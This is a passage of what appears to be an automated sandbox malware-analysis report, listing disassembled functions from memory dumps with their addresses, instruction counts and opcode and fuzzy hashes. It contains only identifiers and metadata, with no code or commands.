                                                                  • Instruction ID: 9fa0ae70b7cd2ef74a2585c18acd4e356c6d5875f25fe1e00d5db5d244597bf5
                                                                  • Opcode Fuzzy Hash: d48551babb6942a697159dabbfd5941ccc16a78906d38616b5e946e2a3cc5ad5
                                                                  • Instruction Fuzzy Hash: AC213B70D04218DFDB24DFA9E0483AEBBF9FB49309F1080A9E419B3745DB796984CB50
                                                                  Function 05DB9165 Relevance: .1, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 22e0280b101712b91afa4b345671620cd6c1bdaf114416579aca3aa5716b78bb
                                                                  • Instruction ID: decee0d1e2ab9d3e6a41a623992231b19864bcf5fe5407f2f89ab01bfce391d3
                                                                  • Opcode Fuzzy Hash: 22e0280b101712b91afa4b345671620cd6c1bdaf114416579aca3aa5716b78bb
                                                                  • Instruction Fuzzy Hash: D531A0B4904258CFEBA0DF65C894BE9BBB2BB49344F5080EAD14EA7250CB759EC5CF14
                                                                  Function 05DBAE37 Relevance: .1, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3b8bcd8ca8c7fd9ecc520b74c611c9de572c1913e4c849c0c56e8f4e2245079a
                                                                  • Instruction ID: 402cbd6cce6006bdfc14413fb0cea7924cf766a5085eafcf831b1f47a45c1cb8
                                                                  • Opcode Fuzzy Hash: 3b8bcd8ca8c7fd9ecc520b74c611c9de572c1913e4c849c0c56e8f4e2245079a
                                                                  • Instruction Fuzzy Hash: 9F21E575A04218CFEB64DF55CC40BE9B7B6FB49304F5081AAE48AA7254DB749E85CF40
                                                                  Function 01340A7A Relevance: .1, Instructions: 56COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5c5ecdc9ca162855d82a852b4abb8cc450c92d9cd2fffaa420b5d99c9e746ac3
                                                                  • Instruction ID: daea0e6c24f36859485c4502bd904adde2e4baa51dd39ef85ecb2ca1a3803d21
                                                                  • Opcode Fuzzy Hash: 5c5ecdc9ca162855d82a852b4abb8cc450c92d9cd2fffaa420b5d99c9e746ac3
                                                                  • Instruction Fuzzy Hash: 7F116D34B00109DFDB48DF68D498AADBBF6AF88718F248059F602EB3A1CB759C01CB40
                                                                  Function 01340860 Relevance: .1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fb1ae7237406a155261bcde9eb618375d5877a54856ef6a500c6d200cf25848c
                                                                  • Instruction ID: 2f269062de37dcf0342b68bde5ea4cb3d3105409ea685a599f9c9b969b743d77
                                                                  • Opcode Fuzzy Hash: fb1ae7237406a155261bcde9eb618375d5877a54856ef6a500c6d200cf25848c
                                                                  • Instruction Fuzzy Hash: 4301F530704248DFE7189B68D664B997FE9EF86718F1180A5E242CF691DB75EC01CBD1
                                                                  Function 0102D02B Relevance: .1, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69696028514.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_102d000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3c1be22053b0e18b091b6a5549f0ea83e777c7fef1e052aaf21e07f9cea9c786
                                                                  • Instruction ID: 81639dacd7a4416aaff825be4fa7808c4a4f9dfadaa9ce9ce46a3ecd894dbc18
                                                                  • Opcode Fuzzy Hash: 3c1be22053b0e18b091b6a5549f0ea83e777c7fef1e052aaf21e07f9cea9c786
                                                                  • Instruction Fuzzy Hash: 8B11D376504280DFDB12CF54D9C4B16BFB2FB84310F24C5AAEC490B656C33AD85ACBA2
                                                                  Function 05DBAEB0 Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e9557da6ef52faeb984de4dc8daf0e040c82024035bc73de7f8eeda38b9ab02f
                                                                  • Instruction ID: 3ba5648f3a063de62e96d7a6278800ec7d5ec461ab2d579a7b9911e6a300143a
                                                                  • Opcode Fuzzy Hash: e9557da6ef52faeb984de4dc8daf0e040c82024035bc73de7f8eeda38b9ab02f
                                                                  • Instruction Fuzzy Hash: 54114971A0421DDFEB68CF64CD81BE9B7B6FB48304F1081AA950AA7240DB759E85CF50
                                                                  Function 06C468E0 Relevance: .1, Instructions: 53COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 94f766d6dff078abc77eacecc3349d9c34f5dd2879aa37cae57c32fe6fa8243e
                                                                  • Instruction ID: 31a6f18b6a12361dca8ec57e4e206b7f362684f517d382ce82bbfd813d8747e7
                                                                  • Opcode Fuzzy Hash: 94f766d6dff078abc77eacecc3349d9c34f5dd2879aa37cae57c32fe6fa8243e
                                                                  • Instruction Fuzzy Hash: 20210AB0D05218DFEBA8DF6BC844BD9B7F6AB8A310F04C0AAD44CA7295DB751985CF50
                                                                  Function 06C43229 Relevance: .1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e60c87514b347c4538f31f76c59b94fe7381e2cba0d4e3748d45d176c9d87a82
                                                                  • Instruction ID: 3cca0962205e1367507a8a27ad2d4a0e0606e7f90d6853a88e05d8265e7b1c8b
                                                                  • Opcode Fuzzy Hash: e60c87514b347c4538f31f76c59b94fe7381e2cba0d4e3748d45d176c9d87a82
                                                                  • Instruction Fuzzy Hash: A011A571D04248FFC7A0EFA9D805A9DBFF4EB49310F1480EAE858D3251DA359B10DBA1
                                                                  Function 05DB7273 Relevance: .1, Instructions: 51COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1a139c4c3ae35db42272414e482da615a6a7e4b761958c83cff2b2fc2ae90c45
                                                                  • Instruction ID: 2e0af6d72bbe41d765f03b55acbbdd3391bde48ea66fc1aef14471f95d3e1be0
                                                                  • Opcode Fuzzy Hash: 1a139c4c3ae35db42272414e482da615a6a7e4b761958c83cff2b2fc2ae90c45
                                                                  • Instruction Fuzzy Hash: 1711E532909049CFDB00CFA8D8965DDBFB2EF4A30879840CBE91657311DAB2D911D754
                                                                  Function 05DB7115 Relevance: .0, Instructions: 50COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3d433362d847b14e91c05334e43ed4cf466ead0b32f31ca4e50e5e09b55e863f
                                                                  • Instruction ID: 29c0cd7f90eaaa0b39d390451e31b948a90803bbe9745359f5cf45946ca8d3f0
                                                                  • Opcode Fuzzy Hash: 3d433362d847b14e91c05334e43ed4cf466ead0b32f31ca4e50e5e09b55e863f
                                                                  • Instruction Fuzzy Hash: 54110D70A05258CFEB44CF95D4547EDBBF7FB89304F406066D44B6B289C7B89884CB15
                                                                  Function 06C4E9F0 Relevance: .0, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 987722ebd4275355e0b9b6369b9dc7bcd55622e9d8a8bfca7abbc3d8eff5007c
                                                                  • Instruction ID: e0772f082ccb7b78ddde1ce6e3caac7303454e0fb8cbfbc1b959b030b9acf504
                                                                  • Opcode Fuzzy Hash: 987722ebd4275355e0b9b6369b9dc7bcd55622e9d8a8bfca7abbc3d8eff5007c
                                                                  • Instruction Fuzzy Hash: E4116670D05218DBEB54EF66D8447DDBBB6FF8A300F1080A9D119A3248CB701A808F80
                                                                  Function 0704EF38 Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726771993.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7030000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e42b0d6f330c168e1a7bdcd09a8b35c81bc96502e8630bae4eae8a35c79de50c
                                                                  • Instruction ID: 41c42a6ecf24bf3905598331726413dc899a419da23fa1853a2b9b3110f5188b
                                                                  • Opcode Fuzzy Hash: e42b0d6f330c168e1a7bdcd09a8b35c81bc96502e8630bae4eae8a35c79de50c
                                                                  • Instruction Fuzzy Hash: 1111B7B4E0020A9FDB54DFF9C8516AEBBF6FF88300F20856AD518A7348D6345A018F91
                                                                  Function 0101D785 Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69695843159.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_101d000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 83201eed535d232b43fc388307327504382d4977e78a7f308f1895e7d67199fc
                                                                  • Instruction ID: 7e491fc75f37164d0234ac86a318bddee5afaf8da0a83f9e2ea09411d856b29f
                                                                  • Opcode Fuzzy Hash: 83201eed535d232b43fc388307327504382d4977e78a7f308f1895e7d67199fc
                                                                  • Instruction Fuzzy Hash: 8B01A731004380DAF7515E69D988B66FFE8FF45374F18846AEE890A18AE27D9444C771
                                                                  Function 05DBEBE0 Relevance: .0, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3240f0074fd8c1e40449420a363600fd8fcfd6691fd9942ad674aa6be781c295
                                                                  • Instruction ID: 4c47defafa63455d957f03d82dee68ebf6b817b7760abc35b639ac4b8edc012a
                                                                  • Opcode Fuzzy Hash: 3240f0074fd8c1e40449420a363600fd8fcfd6691fd9942ad674aa6be781c295
                                                                  • Instruction Fuzzy Hash: 100113B4D04248EFDB44DFA9D8409EEBBFAFB48300F1081AAE859A3345D7708A40DF91
                                                                  Function 05DB09C2 Relevance: .0, Instructions: 40COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b774c7ec7ae4000eecac4a62514b321600d74edcf8410474b38fe41a274cecbe
                                                                  • Instruction ID: b2694bcdad05b477fc608dcc4ff9a1b563cf8a7465910cedda8ee6a8ad1dceae
                                                                  • Opcode Fuzzy Hash: b774c7ec7ae4000eecac4a62514b321600d74edcf8410474b38fe41a274cecbe
                                                                  • Instruction Fuzzy Hash: 34F02875809208DBEB25DFB4D81869DBFB2EB46300F1481EBC88927255DAB25E05CB92
                                                                  Function 05DBAF19 Relevance: .0, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c4fcffb80143524dc4d34c8e76eed28c48dd1b4c07af85823bdc4eadb4dadaba
                                                                  • Instruction ID: 91a57a3d78630b8f00497d209e497257c07368717273b79a896086c6c0392120
                                                                  • Opcode Fuzzy Hash: c4fcffb80143524dc4d34c8e76eed28c48dd1b4c07af85823bdc4eadb4dadaba
                                                                  • Instruction Fuzzy Hash: 3E1183B4905218CFEBA0CF15D884BE877B2BB49315F5041DAD04EA7280DB795EC5CF54
                                                                  Function 06C47430 Relevance: .0, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0419310b13104d3e96d5b1118f7e84483baf4a9b2e86131b3b23ce123240f5cc
                                                                  • Instruction ID: fc2c1dbd45252e238a6cd6b0c54853e156708e130e3fd006580d571e692a6c73
                                                                  • Opcode Fuzzy Hash: 0419310b13104d3e96d5b1118f7e84483baf4a9b2e86131b3b23ce123240f5cc
                                                                  • Instruction Fuzzy Hash: A90128B0D05208EFCB50EFB8D9446AEBBF8EB49304F2045AED848E3244E7355B41CBA1
                                                                  Function 05DBB629 Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 29177605de0d6b4c4e4efadde9b3a561d3375b7b7eb05259083ca4a2b0892960
                                                                  • Instruction ID: dc5603a49a535c6567393c0a98748df983733cf6c8c2b995957a8a78290d717a
                                                                  • Opcode Fuzzy Hash: 29177605de0d6b4c4e4efadde9b3a561d3375b7b7eb05259083ca4a2b0892960
                                                                  • Instruction Fuzzy Hash: EB119D74904228CFEBA0CF59D884BD8B7B2BB49305F50819AD44DAB344DB785E89CF54
                                                                  Function 05DBA843 Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d621cfba60ec20d37f342ba8c8ac2c843ff2466ed0b81fa8b7fbfbc61f8e6849
                                                                  • Instruction ID: cfc656d4eeceb8550f4d813a545c02ee0f0093dd6e46877cbddb1fe3b4ce6e32
                                                                  • Opcode Fuzzy Hash: d621cfba60ec20d37f342ba8c8ac2c843ff2466ed0b81fa8b7fbfbc61f8e6849
                                                                  • Instruction Fuzzy Hash: AC01563180430AABCF12DF99C8008EEBB76EF49310F04C54AE99823211D331A666CBA0
                                                                  Function 05DB6821 Relevance: .0, Instructions: 37COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9fbaffc86a8ff493bbbd6ec0f7ab952b875fa138acad3e370536de0da6514248
                                                                  • Instruction ID: 41f53fa132521c91bf11cc0dbd27b57632150d1f76b5d26b1314f56ceb80dc6b
                                                                  • Opcode Fuzzy Hash: 9fbaffc86a8ff493bbbd6ec0f7ab952b875fa138acad3e370536de0da6514248
                                                                  • Instruction Fuzzy Hash: 2FF0FF75E09240CBE3118FA488545E8BF72EB4A200F0880CFC8C65B686CA76C607C751
                                                                  Function 05DBC0FC Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1c81abec7ac8ed5ebe1168efac8f166aa1fd86a88b149cf3c14ba5da2084f4d2
                                                                  • Instruction ID: 657d8002a0c5c0274f5294d2980cd17fb46f368ec470bb72b1cbd749cb05382f
                                                                  • Opcode Fuzzy Hash: 1c81abec7ac8ed5ebe1168efac8f166aa1fd86a88b149cf3c14ba5da2084f4d2
                                                                  • Instruction Fuzzy Hash: 7701D774900219CFEB50CFA9C981BEDB7F2FB08315F5080AAD419A7291DB759E41CF40
                                                                  Function 06C49255 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: df01e6537e0195358f429dc74c8874cce9d71b920c40c8f613a6755c2848f0a1
                                                                  • Instruction ID: b794271f7e39457fe72093744b08576dcc24f6a9c1b7aebf58899641222aa3c5
                                                                  • Opcode Fuzzy Hash: df01e6537e0195358f429dc74c8874cce9d71b920c40c8f613a6755c2848f0a1
                                                                  • Instruction Fuzzy Hash: 9C119374901128CFCBA4DF25D854AD9BBF1BF49300F1050E9D14DA73A4DA316E80CF41
                                                                  Function 06C46B63 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69725786172.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_6c40000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aca6460154dcce6ae8a9f5b2b2e8628df580b16f674e7d3859333f7e22d7a4e4
                                                                  • Instruction ID: 9831070286c73bb2bf0160fae7995d1470b3ae4d44ad188d78df34e0074f2314
                                                                  • Opcode Fuzzy Hash: aca6460154dcce6ae8a9f5b2b2e8628df580b16f674e7d3859333f7e22d7a4e4
                                                                  • Instruction Fuzzy Hash: 69015A74D08208DFDB50CF6AD48879CBBF1FF0A324F24449AD449A7259C7765989CF50
                                                                  Function 0101D784 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69695843159.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_101d000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5bd95095c8265ec0a1eefc2d3ad9a6e6f974087028907463e53945756e062845
                                                                  • Instruction ID: 16671cada874995828a4bb48e9b4f134366e1cc97470f7f668951d8393f215dc
                                                                  • Opcode Fuzzy Hash: 5bd95095c8265ec0a1eefc2d3ad9a6e6f974087028907463e53945756e062845
                                                                  • Instruction Fuzzy Hash: 22F06271404384DEFB518E5AD8C8B62FFE8EB45734F18C59BED484A286D2799844CBB1
                                                                  Function 05DBD508 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 49cd1bcc0ea80327fbbbe46ce2e154cac5393d559ef0b0421991f27c402915cb
                                                                  • Instruction ID: 6bdc3914119fb7a8f6da6f68b95cf05d2a4a619b6ff6acc49328f89a589f4406
                                                                  • Opcode Fuzzy Hash: 49cd1bcc0ea80327fbbbe46ce2e154cac5393d559ef0b0421991f27c402915cb
                                                                  • Instruction Fuzzy Hash: 47016D71D00709DBCB11EFA8D8405D8FBB1FF99324F14CA9AD89977200E731A695CB90
                                                                  Function 07035901 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69726771993.0000000007030000.00000040.00000800.00020000.00000000.sdmp, Offset: 07030000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_7030000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3b179acafe163372b71a4e5c1288c20a8f6604217e2d03e44b3e58a3cbc99bed
                                                                  • Instruction ID: 7bf4900d1911c80219a4e48c2c103ca3f703d1260b3885286b3f145d45c241bd
                                                                  • Opcode Fuzzy Hash: 3b179acafe163372b71a4e5c1288c20a8f6604217e2d03e44b3e58a3cbc99bed
                                                                  • Instruction Fuzzy Hash: C711E5B8A44228CFDB64DF18D888AD9B7B6FB49304F5041E9D55DA7348CA349E85CF40
                                                                  Function 013473BE Relevance: .0, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69698202205.0000000001340000.00000040.00000800.00020000.00000000.sdmp, Offset: 01340000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_1340000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 776754a391ba00eaab073909a2cd9fd792f77a570aec321cc73363ef9783c15c
                                                                  • Instruction ID: 6c15f46a8fdc7bf6d6c302bc5bf1132abd574509266b18b4f42bfdf0f32d8013
                                                                  • Opcode Fuzzy Hash: 776754a391ba00eaab073909a2cd9fd792f77a570aec321cc73363ef9783c15c
                                                                  • Instruction Fuzzy Hash: EB019374E0022ACFCB64DF18D9506E8B7B1BF49310F5481E9E88DA7745DB716E858F50
                                                                  Function 05DBBA18 Relevance: .0, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1e6b6114de822faa476d8b940e6779acb7ffb61164140a4b784c1649ee4c06e8
                                                                  • Instruction ID: 75aa5fc76eb49264acefaf2c7ebe3f8c9232ce3a321d4873f1f39a2516cf1782
                                                                  • Opcode Fuzzy Hash: 1e6b6114de822faa476d8b940e6779acb7ffb61164140a4b784c1649ee4c06e8
                                                                  • Instruction Fuzzy Hash: 6AF06D74808348EFDB11CF94C8545E8BFB1EF59200F14C1DBECD662256D6B18A12DB51
                                                                  Function 05DBA850 Relevance: .0, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cf5870a7b6af6c3d93a934c202dc8f979cbb8790ef2d832249c12194061386e2
                                                                  • Instruction ID: ed19ced6ad6ad26478c94a0babb365f2ed287259a9fcc8ae04a2421362e00221
                                                                  • Opcode Fuzzy Hash: cf5870a7b6af6c3d93a934c202dc8f979cbb8790ef2d832249c12194061386e2
                                                                  • Instruction Fuzzy Hash: 07F0EC35C0020AEBDF11DF99D8009EDBB75FF89310F10C51AE95937214D771A566DB91
                                                                  Function 05DBD841 Relevance: .0, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.69722432158.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_5db0000_IsNestedFamANDAssem.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e820c696cef4c0f60782821475ba6f8789243ade9227f551d81bb00a63392239
                                                                  • Instruction ID: ab17943cea08f8985eba15837cec358553e17a3ce1953579ffbc41a49366e7eb
                                                                  • Opcode Fuzzy Hash: e820c696cef4c0f60782821475ba6f8789243ade9227f551d81bb00a63392239
                                                                  • Instruction Fuzzy Hash: 63F09A38C04208EFCB11DF95C800A9CBFB6EF4A211F10C1ABDC89AB346D6328A11DB41
                                                                  Function 0134A277 Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
